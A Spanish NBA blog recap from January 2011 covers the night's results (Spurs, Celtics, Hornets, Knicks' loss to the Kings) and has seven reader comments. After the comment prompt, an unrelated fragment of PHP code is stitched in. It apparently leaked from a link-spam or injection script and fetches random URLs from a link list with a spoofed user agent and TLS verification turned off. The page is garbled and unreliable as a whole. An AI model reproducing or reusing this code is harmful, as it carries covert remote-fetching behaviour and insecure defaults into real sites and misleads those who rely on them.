La Crónica (14/01/2011)

15 de January de 2011 por TheDeerHunter

11 platos de un menú para todo tipo de paladares, hoy.

Los líderes de ambas conferencias sacaron adelante sus compromisos. Los Spurs sudaron poco para endosarle la 4ª derrota consecutiva a los mermados Mavericks, pero los Celtics sí se vieron apurados para doblegar a los Bobcats. El líder de los verdes fue anoche Shaquille O’neal, en su mejor partido de lo que va de curso.

De entre todos los perseguidores destacó la apurada victoria de los Hornets en Houston. El dulce regreso de Kevin Martin y un tocado Chris Paul les tuvo contra las cuerdas buena parte del choque. La reacción vino de la mano de David West, nada menos que 16 puntos de ventaja que dejaron escapar los Rockets en el último cuarto, para llegar a la prórroga donde los Hornets culminaron la remontada. El palo hubiera sido aún más gordo para los Rockets de haber ganado Blazers a los Suns. Nash y los suyos lo impidieron y la última plaza de playoffs sigue tocándose con los dedos.

Los Warriors también se suman a esa fiesta con la brillante victoria ante los Clippers. Curry, Lee y, sobre todo, Monta Ellis estuvieron finos para compensar el gran partido de Gordon y Griffin. En esta ocasión Baron Davis falló en la ecuación y a los Clippers la postemporada se pone cada vez más imposible.

En medio de los cantos de sirena que llegan desde Denver los Knicks se dieron un batacazo de aupa en casa contra los asequibles Kings. Beno Udrih le dió un tremendo meneo a Felton y los titulares locales estuvieron todos para los leones.

Para ir terminando, Chicago y Utah ganaron sobraditos a Indiana y Cleveland respectivamente. Los Lakers tampoco tuvieron muchos problemas con los Nets. los Raptors perdieron contra los Pistons y una impresionante acción defensiva de Iguodala sobre Maggette le dió la victoria a Philadelphia sobre Milwaukee por un único punto.

MVP: El mejor partido del curso de Beno Udrih. Tampoco lo veremos mucho más por aquí. 29 puntos, 5 rebotes y 4 asistencias en la sorpresa de la jornada en el Madison.

El rookie: Se lo podríamos dar al de siempre, que estuvo inmenso, pero dado que los Clippers perdieron y que Cousins mostró su personalidad ante Stoudemire, sus 16-10 y la victoria le otorgan el premio hoy.

La sorpresa: Es duro decirlo, pero que a estas alturas Shaq anote 23 puntos y de 5 tapones es toda una sorpresa.

La decepción: Justo ayer reflexionaba sobre lo bajo que está Felton en las votaciones para el all-star game con el temporadón que se está marcando. Con baños como el que se llevó de manos de Udrih lo va a tener mucho más difícil.

El mayor esfuerzo en vano: La tríada de los Nets. Brook hizo el partido de la temporada y Farmar&The Machine se lucieron en la visita a sus ex-compañeros.

Comenta

7 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Los Knicks como anden ahora pendientes de algo que no sea rendir al máximo pueden perder todo lo ganado.

    Es muy dificil que los Celtics aguanten un ritmo de victorias alto en la regular, pero si llegan con todos sanos a play-offs yo apuesto de largo por ellos como ganadores del Este, de momento ningun entrenador de esa conferencia ha podido tácticamente con Rivers, otra cosa es que bajara Riley, ahí si sería una batalla de las grandes.

      Citar

  2. Sancho88 dice:
    #2

    Pues, no sería nada desdeñable que lo haga, por lo menos en playoffs. Nadie se puede creer la milonga de que Spoelstra es el gran entrenador para Miami… no jodamos. Unas finales fraticidas entre Boston y Miami con Riley de por medio… seria la lexe.

    Y bueno, personalmente, por primera vez en muchas semanas me levanto esbozando una sonrisa. Que los Kings se pulan a Stoudamire me parece épico.

    Lo más cojonudo de todo, es que, de las ultimas 6 visitas al Garden, se han llevado 4 victorias.

    No me pregunteis como, jajaja.

    En realidad, como dice Hunter, los Knicks están sucumbiendo al canto de sirena desde Denver. No debe ser muy agradable salir a jugar cada noche con los rumores de traspasos. Por otra parte, seria cojonudo ver a Stat y Melo juntos. A ver que pasa

      Citar

  3. Denise dice:
    #3

    Brown debería empezar a jugar algunos minutos como base. Su nivel lleva siendo realmente bueno todo el año, mientras que la temporada de Fisher y de Blake están siendo penosas.
    Partidazo de McGrady

      Citar

  4. max dice:
    #4

    Yo creo que actualmente uno de los problemas de los Knicks es su clasificación en el Este: Sextos. Tienen a los cinco primeros bastante lejos, sin opción a atraparlos (son mejores equipos que ellos), y a partir de ellos mismos ya no hay nada, ningún equipo que los pueda presionar. Nada por delante y nada por detrás. Motivarse debe de ser dificilísimo.

      Citar

  5. Jabho dice:
    #5

    Yo si creo que los Celtics están capacitados para liderar la conferencia en la regular. Es increíble como está jugando y no es que no hayan tenido problemas de lesiones. Solo hay que ver los minutos que han jugado harengory o Erden.

    En breve reaparecerán Garnett y Jermaine y en 1 mes aprox. Perkins y West.

    Si no hay más problemas con el equipo al completo se pueden dosificar un poco Pierce y allen, que es lo que más me preocupa a mi, y mejorar la estadística de rebote en la que los Celtics son los peores de la liga.

    Si conseguimos rebotear mejor (y la vuelta de Perkins, Garnett y que juegue habitualmente Maine debería ayudar) el equipo será temible.

    Además como dices en el Este Doc Rivers debería ser un punto a favor llegados los PO, al menos por lo que hemos visto hasta ahora.

      Citar

  6. Viva_Dirk dice:
    #6

    Bueno Denise, yo no creo que la temporada de Blake este siendo penosa, esta mas o menos en los números de su carrera en relación a los minutos que juega, una de sus principales funciones es abrir el campo y eso lo esta haciendo muy bien.

      Citar

  7. Denise dice:
    #7

    No creo que Blake encuentre otro equipo como Lakers en el que cuando tira siempre está más solo que la una gracias a los 2×1 o a las ventajas generadas por los Kobe, Pau, Odom, ….. Quizás penosa no, pero si habría que exigirle más tiro, que las enchufe con regularidad cuando está solo que tiempo tiene todo el del mundo para prepararse el tiro.
    Apuesto por Heat como ganadores de la Regular en el Este.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>